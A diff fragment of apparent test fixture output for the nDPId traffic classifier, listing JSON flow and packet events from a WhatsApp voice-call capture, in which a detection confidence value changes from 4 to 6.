00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706912,"flow_last_seen":1561455706912,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706912,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1561455706912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706912,"pkt":"xiwDYGpkkLkxKPrKCABFAACav+gAAEARgnnAqAIMHw1WMNwIDZYAhhEmAAMAaiESpEKmZ0918K0sABMVszZAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706912,"flow_last_seen":1561455706912,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706912,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706912,"flow_last_seen":1561455706912,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706912,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1561455706912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706912,"pkt":"xiwDYGpkkLkxKPrKCABFAACaKEAAAEARGiLAqAIMHw1WMNwIDZYAhhElAAMAaiESpEKmZ0918K0sABMVszdAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706912,"flow_last_seen":1561455706912,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706912,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1561455706912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706912,"pkt":"xiwDYGpkkLkxKPrKCABFAACa\/egAAEARKEbAqAIMuTzYM9wIDZYAhvTwAAMAaiESpEKmZ0918K0sABMVszhAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":217,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706912,"flow_last_seen":1561455706912,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706912,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":217,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706912,"flow_last_seen":1561455706912,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706912,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1561455706912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706912,"pkt":"xiwDYGpkkLkxKPrKCABFAACaQnoAAEAR47TAqAIMuTzYM9wIDZYAhvTvAAMAaiESpEKmZ0918K0sABMVszlAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706913,"flow_last_seen":1561455706913,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706913,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1561455706913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706913,"pkt":"xiwDYGpkkLkxKPrKCABFAACaTo8AAEARCe\/AqAIMnfDBMNwIDZYAhic+AAMAaiESpEKmZ0918K0sABMVszpAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} 
-00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706913,"flow_last_seen":1561455706913,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706913,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706913,"flow_last_seen":1561455706913,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706913,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1561455706913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706913,"pkt":"xiwDYGpkkLkxKPrKCABFAACapTEAAEARs0zAqAIMnfDBMNwIDZYAhic9AAMAaiESpEKmZ0918K0sABMVsztAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706913,"flow_last_seen":1561455706913,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706913,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1561455706913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706913,"pkt":"xiwDYGpkkLkxKPrKCABFAACa5uYAAEARXUvAqAIMszzAMNwIDZYAhhLwAAMAaiESpEKmZ0918K0sABMVszxAAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} -00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706913,"flow_last_seen":1561455706913,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706913,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706913,"flow_last_seen":1561455706913,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706913,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1561455706913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706913,"pkt":"xiwDYGpkkLkxKPrKCABFAACaa6sAAEAR2IbAqAIMszzAMNwIDZYAhhLvAAMAaiESpEKmZ0918K0sABMVsz1AAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706914,"flow_last_seen":1561455706914,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706914,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1561455706914,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706914,"pkt":"xiwDYGpkkLkxKPrKCABFAACa6jAAAEARaz\/AqAIMnfDEPtwIDZYAhiQsAAMAaiESpEKmZ0918K0sABMVsz5AAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706914,"flow_last_seen":1561455706914,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706914,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706914,"flow_last_seen":1561455706914,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455706914,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":56328,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1561455706914,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455706914,"pkt":"xiwDYGpkkLkxKPrKCABFAACa\/isAAEARV0TAqAIMnfDEPtwIDZYAhiQrAAMAaiESpEKmZ0918K0sABMVsz9AAABmBQMIJtiE6i6kxJRLo58phnvyQbwdH1IoGV\/3YC8zAuYePvTeDeuXmJ+hMpM+Z145gcRU0WpajKrpUh0EIdumCzsyn4WKcuXddBNppoCNhIFnLa3lhKJz05n+MdP5HkVFVJtym9c0"} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1561455706925,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455706925,"pkt":"kLkxKPrKxiwDYGpkCABFAABIJPUAAFQRCb8fDVYwwKgCDA2W3AgANMY6AQMAGCESpEKmZ0918K0sABMVszYAIAAIAAHthnGmBnJAAgAIAAABa44DQzM="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1561455706935,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455706935,"pkt":"kLkxKPrKxiwDYGpkCABFAABIB5sAAFMROyed8MQ+wKgCDA2W3AgANNk5AQMAGCESpEKmZ0918K0sABMVsz4AIAAIAAHthnGmBnJAAgAIAAABa44DQzo="} 
@@ -84,84 +84,84 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1561455706945,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455706945,"pkt":"kLkxKPrKxiwDYGpkCABFAABIKZAAAFMR6fC5PNgzwKgCDA2W3AgANKn2AQMAGCESpEKmZ0918K0sABMVszgAIAAIAAHthnGmBnJAAgAIAAABa44DQ0I="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706979,"flow_last_seen":1561455706979,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455706979,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":64716,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1561455706979,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1561455706979,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClm6MAAAIRafbAqAIM7\/\/\/+vzMB2wAkbYGTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706979,"flow_last_seen":1561455706979,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455706979,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":64716,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455706979,"flow_last_seen":1561455706979,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455706979,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":64716,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455707435,"flow_last_seen":1561455707435,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1561455707435,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1561455707435,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1561455707435,"pkt":"xiwDYGpkkLkxKPrKCABFAAA+06QAAP8RYqzAqAIMwKgCAeyFADUAKgBWfx8BAAABAAAAAAAAA3Bwcwh3aGF0c2FwcANuZXQAAAEAAQ=="} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455707435,"flow_last_seen":1561455707435,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1561455707435,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"pps.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455707435,"flow_last_seen":1561455707435,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1561455707435,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": 
{"query":"pps.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1561455707470,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"thread_ts_msec":1561455707470,"pkt":"kLkxKPrKxiwDYGpkCABFAABnIjoAAEAR0u7AqAIBwKgCDAA17IUAUyY\/fx+BgAABAAIAAAAAA3Bwcwh3aGF0c2FwcANuZXQAAAEAAcAMAAUAAQAACz4ADQZtbXgtZHMDY2RuwBDALgABAAEAAAA+AASd8BQ0"} -00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455707435,"flow_last_seen":1561455707470,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1561455707470,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"pps.whatsapp.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"157.240.20.52"}} 
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455707435,"flow_last_seen":1561455707470,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1561455707470,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60549,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"pps.whatsapp.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"157.240.20.52"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455707474,"flow_last_seen":1561455707474,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1561455707474,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 